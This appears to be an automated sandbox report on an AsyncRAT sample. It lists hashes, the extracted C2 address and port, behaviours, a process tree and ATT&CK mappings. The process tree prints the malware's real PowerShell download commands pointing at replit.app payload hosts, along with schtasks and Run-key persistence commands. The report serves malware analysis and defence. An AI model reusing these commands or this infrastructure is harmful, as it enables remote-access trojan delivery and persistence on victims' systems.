Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
30-07-2024 08:27
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7-20240708-en
General
-
Target
sample.exe
-
Size
510KB
-
MD5
2b19d65705eee546214513fb65948b2a
-
SHA1
20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
-
SHA256
106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
-
SHA512
183bb9331b20d2f4118820bd372e5202220e29cfea2d5ae5fedd8d1a9bfaf548a9399aa604950553948899a1d75658e64480c660ce7f83bb89cd566e1385eb72
-
SSDEEP
6144:+ldk1cWQRNTB2/Me7eC9g1HGnKBvYfew0PjZmwvhhlJdZBuUwXtgZcJeJ:+cv0NTg/XrRnKBwfOM0dayZKeJ
Malware Config
Extracted
asyncrat
0.5.7B
Default
192.228.105.2:7707
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
svchst.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2216-43-0x0000000005150000-0x0000000005162000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1144 powershell.exe 28 1156 powershell.exe -
pid Process 1144 powershell.exe 1156 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0004000000022a93-33.dat net_reactor behavioral2/memory/2216-35-0x00000000003D0000-0x0000000000438000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation CoinAIfdp.exe Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation sample.exe -
Executes dropped EXE 2 IoCs
pid Process 2216 CoinAIfdp.exe 872 svchst.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CoinAIfdp.exe" CoinAIfdp.exe Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoinAi.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchst.exe" svchst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sample.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoinAIfdp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4788 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2608 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1144 powershell.exe 1144 powershell.exe 1156 powershell.exe 1156 powershell.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe 2216 CoinAIfdp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1144 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 2216 CoinAIfdp.exe Token: SeDebugPrivilege 872 svchst.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3816 wrote to memory of 1900 3816 sample.exe 86 PID 3816 wrote to memory of 1900 3816 sample.exe 86 PID 1900 wrote to memory of 1144 1900 cmd.exe 89 PID 1900 wrote to memory of 1144 1900 cmd.exe 89 PID 1900 wrote to memory of 1156 1900 cmd.exe 94 PID 1900 wrote to memory of 1156 1900 cmd.exe 94 PID 1900 wrote to memory of 2216 1900 cmd.exe 95 PID 1900 wrote to memory of 2216 1900 cmd.exe 95 PID 1900 wrote to memory of 2216 1900 cmd.exe 95 PID 2216 wrote to memory of 1072 2216 CoinAIfdp.exe 107 PID 2216 wrote to memory of 1072 2216 CoinAIfdp.exe 107 PID 2216 wrote to memory of 1072 2216 CoinAIfdp.exe 107 PID 2216 wrote to memory of 3684 2216 CoinAIfdp.exe 109 PID 2216 wrote to memory of 3684 2216 CoinAIfdp.exe 109 PID 2216 wrote to memory of 3684 2216 CoinAIfdp.exe 109 PID 3684 wrote to memory of 4788 3684 cmd.exe 112 PID 3684 wrote to memory of 4788 3684 cmd.exe 112 PID 3684 wrote to memory of 4788 3684 cmd.exe 112 PID 1072 wrote to memory of 2608 1072 cmd.exe 111 PID 1072 wrote to memory of 2608 1072 cmd.exe 111 PID 1072 wrote to memory of 2608 1072 cmd.exe 111 PID 3684 wrote to memory of 872 3684 cmd.exe 113 PID 3684 wrote to memory of 872 3684 cmd.exe 113 PID 3684 wrote to memory of 872 3684 cmd.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8117.tmp\8118.tmp\8119.bat C:\Users\Admin\AppData\Local\Temp\sample.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\CoinAIfdp.exeCoinAIfdp.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\Admin\AppData\Roaming\svchst.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\Admin\AppData\Roaming\svchst.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9DA2.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4788
-
-
C:\Users\Admin\AppData\Roaming\svchst.exe"C:\Users\Admin\AppData\Roaming\svchst.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD549e7d5f2a296b59afec08bc314bed998
SHA17f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839
-
Filesize
1KB
MD5dea2d3fd66551ec95e5f7eeba057b20e
SHA1ae8100a5520e289a265ad7c5c1be9c7506e91ece
SHA2567fc62d39b61bc5c160c6351dfd9ce1836e90b8f9ecbb14540c325f4f21b8997f
SHA512b6c082e570a0d1704de9b6d3a1c0d6809030e34f6e28e34f433aaa31e4cd43a1050ae1159c7b0f5cbbeea9d2828380b589a0f5f33d9f238f8f4d19000488b375
-
Filesize
329B
MD591f265d84f2c400c6f731982fbc1dd26
SHA16d175c5694e58dd4d0ea55e77679de57105c6b0d
SHA256ded4d515b9bcfdd3221da6239dc2fac799b129712ffcc1f92722a2c508a0c173
SHA5124ea36db68fa533eb1b55d365abf400c9fc6cca8968b1950da2c02fd56f72b7a031583c8c730a4003354f2b010a879e94d15b80a3595e50581c72ad25c75bb67b
-
Filesize
393KB
MD51b3e4783a56a59a811cbd437c6c34a18
SHA11c3c098d76f93570c6f72a815ee1e257da9e2a7f
SHA256b92d49db7714fcadcfa107dbc3a37a12fa30e4aadebd1eb1d551ccfe61f638de
SHA512c7ab45b5376677ce3484b2d575304fe23a38eb1491245d899e57c6491c999704318d6f5bf5b2fa560692bf52c531c4445f999e95269a1443323fccb73ac58e38
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150B
MD5a61cf152119787e2aa32ba7f4d03224a
SHA1d23c263bed05fa7b2fe2fce42100aa8c6621a6a3
SHA256864dffe420ea0942eed41b7791c21c0a8edcc02e258ea7d522621689f9bbfd66
SHA512e524043603b421bdcd12b67066fec33ea14b9b98bcab43df3ddeb0b7a9b191442af7784959d72735bb3700405ad32f2e7f70f9eb42bd71faf133b9a5115ba4bc
-
Filesize
75KB
MD5834cfe4c91e1aa48057f85f67999adc8
SHA12803f3605af8f9c1f34011060b1413792e57c258
SHA2567e7039d296a5e761e4e8950966a05311d8b52055e31178eaa0b22e6aec51d85f
SHA5120fef2021ac2e0eced4914ad022438caf116c2e93074fd36a498229094246bd29a320ba9d1b112f6994e7ab3a268e6a95371844ba78202afd45752ce4fc0dcd1c